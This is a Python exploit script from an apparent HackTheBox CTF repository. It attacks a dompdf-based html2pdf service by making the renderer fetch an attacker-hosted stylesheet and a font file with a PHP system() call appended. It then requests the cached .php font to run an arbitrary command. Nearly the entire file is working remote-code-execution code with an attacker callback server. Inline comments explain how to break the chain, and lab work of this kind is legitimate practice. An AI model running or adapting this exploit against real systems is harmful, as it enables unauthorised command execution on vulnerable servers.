CTF/HTB/interface/shell.py
Simon 82b0759f1e init htb
old htb folders
2023-08-29 21:53:22 +02:00


import hashlib
import os
import subprocess
import sys
import time
from flask import Flask, Response
import requests, base64
import random
from threading import Thread
# Flask application object; the two callback routes below are registered on it.
app = Flask(__name__)

# Raw bytes of the on-disk font template. Every /exploit/ response starts
# with these bytes, followed by the appended PHP fragment.
ttf = b""
with open("exploit_font_template.php", "rb") as template_file:
    ttf = template_file.read()

# Hex MD5 of the most recently generated font URL. Written by css() and read
# by the __main__ block when it builds the final request path.
md5 = ""

# Command string taken from the first CLI argument, kept as bytes because it
# is concatenated into a bytes response. Running the script without an
# argument raises IndexError on this line.
cmd = sys.argv[1].encode()

# Callback flags: each route handler sets its flag once the remote side has
# requested that route. The __main__ block waits on got_php.
got_css = False
got_php = False

# HTTP proxy passed to the initial POST only (the later GET does not use it).
# NOTE(review): looks like a local intercepting proxy; confirm.
proxy = {'http':'http://127.0.0.1:8080'}
@app.route('/css/<name>')
def css(name):
    """Serve a stylesheet whose ``@font-face`` rule points at the /exploit/ route.

    Side effects: sets ``got_css`` and stores the hex MD5 of the generated
    font URL in the module-level ``md5``. ``name`` is accepted only so any
    ``/css/<something>`` path matches; it is not used.

    MD5 is used here purely to reproduce a file-naming scheme (the digest is
    later embedded in the ``exploitfont_normal_<md5>.php`` path requested by
    the __main__ block), not as a security primitive.

    Defensive context: this handler is only ever reached if the HTML renderer
    follows the remote ``<link rel=stylesheet>`` it was given. A renderer with
    remote resource loading disabled never requests it.
    """
    global md5, got_css
    got_css = True

    # A random suffix makes the font URL differ between runs.
    font_url = f"http://10.10.16.47/exploit/exploit_font{random.randint(0,9999)}.php"
    md5 = hashlib.md5(font_url.encode()).hexdigest()

    stylesheet = "\n".join([
        "@font-face {",
        "font-family:'exploitfont';",
        "src:url('" + font_url + "');",
        "font-weight:'normal';",
        "font-style:'normal';",
        "}",
    ])
    return Response(stylesheet)
@app.route('/exploit/<name>')
def exploit(name):
    """Serve the font template bytes followed by a PHP ``system()`` fragment.

    Sets ``got_php`` so the __main__ block knows the font URL was fetched,
    and prints the command being embedded. ``name`` only makes the route
    match any ``/exploit/<something>`` path; it is not used.

    Defensive context: the response is a font file with PHP appended, served
    from a URL ending in ``.php``. It becomes a problem only when the fetching
    side stores it under a web-served directory and keeps that extension.
    Keeping the font cache outside the web root, or refusing non-font
    extensions for cached fonts, breaks the chain at this step.
    """
    global ttf, got_php
    got_php = True
    print(f"cmd = {cmd}")
    # cmd is inserted as-is between single quotes; no escaping is applied.
    php_prefix = b"<?php system('"
    php_suffix = b"') ?>"
    return b"".join((ttf, php_prefix, cmd, php_suffix))
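class Server(Thread):
    """Background thread that runs a web application object.

    Configure the instance with ``setIP``, ``setPort`` and ``setServerObject``
    before calling ``start()``. ``run`` then calls the app's own ``run(host=,
    port=)`` method. The thread is not marked as a daemon, so the process
    stays alive for as long as the app keeps serving.
    """

    # Default listening port; setPort() overrides it per instance.
    port = 80
    # Not read by any method of this class.
    cmd = b''

    def __init__(self):
        # Fix: the original spelled this method ``__int__``, so it was never
        # used as the constructor and Thread.__init__ ran only by inheritance.
        super().__init__()

    def setIP(self, ip):
        """Set the address the app will bind to."""
        self.ip = ip

    def setPort(self, port):
        """Set the port the app will listen on."""
        self.port = port

    def setServerObject(self, obj):
        """Set the application object; it must expose ``run(host=..., port=...)``."""
        self.app = obj

    def run(self) -> None:
        """Thread body: start the app and report any exception instead of raising."""
        try:
            self.app.run(host=self.ip, port=self.port)
        except Exception as e:
            # Best-effort: a failure to bind or serve is printed, not propagated,
            # so it never surfaces as an unhandled thread exception.
            print(f"exception: {e}")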
import logging

# Only show werkzeug errors; per-request access lines are suppressed.
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)

if __name__ == '__main__':
    # Sequence, as visible in this block:
    #   1. start the local callback server in a background thread,
    #   2. POST an HTML fragment to the html2pdf endpoint that references a
    #      stylesheet on the local server,
    #   3. wait until the /exploit/ route has been requested,
    #   4. request the .php file expected under the library's lib/fonts/
    #      directory and print the tail of the response.
    #
    # Defensive context: on the rendering host this shows up as an outbound
    # fetch of a remote stylesheet and font by the PDF service, followed by an
    # inbound request for a ``.php`` file under ``lib/fonts/``. Disabling
    # remote resource loading in the renderer, and not serving or executing
    # files from its font directory, each stop the sequence.
    stylesheet_link = f"<link rel=stylesheet href='http://10.10.16.47/css/{random.randint(0,99999)}.css'>"
    payload = {"html": stylesheet_link}

    listener = Server()
    listener.setIP("10.10.16.47")
    listener.setPort("80")  # passed as a string, exactly as in the original
    listener.setServerObject(app)
    listener.start()

    # Short pause so the listener is up before the remote side calls back.
    time.sleep(0.5)

    requests.post(
        "http://prd.m.rendering-api.interface.htb/api/html2pdf",
        json=payload,
        proxies=proxy,
    )

    # Busy-wait until exploit() has set the flag (no sleep, no timeout).
    while not got_php:
        pass

    cached_font_url = f'http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_{md5}.php'
    resp = requests.get(cached_font_url)

    # The first 440 characters are skipped, presumably the font template
    # bytes that precede the command output; confirm against the template.
    print(resp.text[440:])

    # The Server thread is never stopped or marked as a daemon, so the script
    # ends itself by running ``kill`` on its own PID.
    subprocess.call(['kill', str(os.getpid())])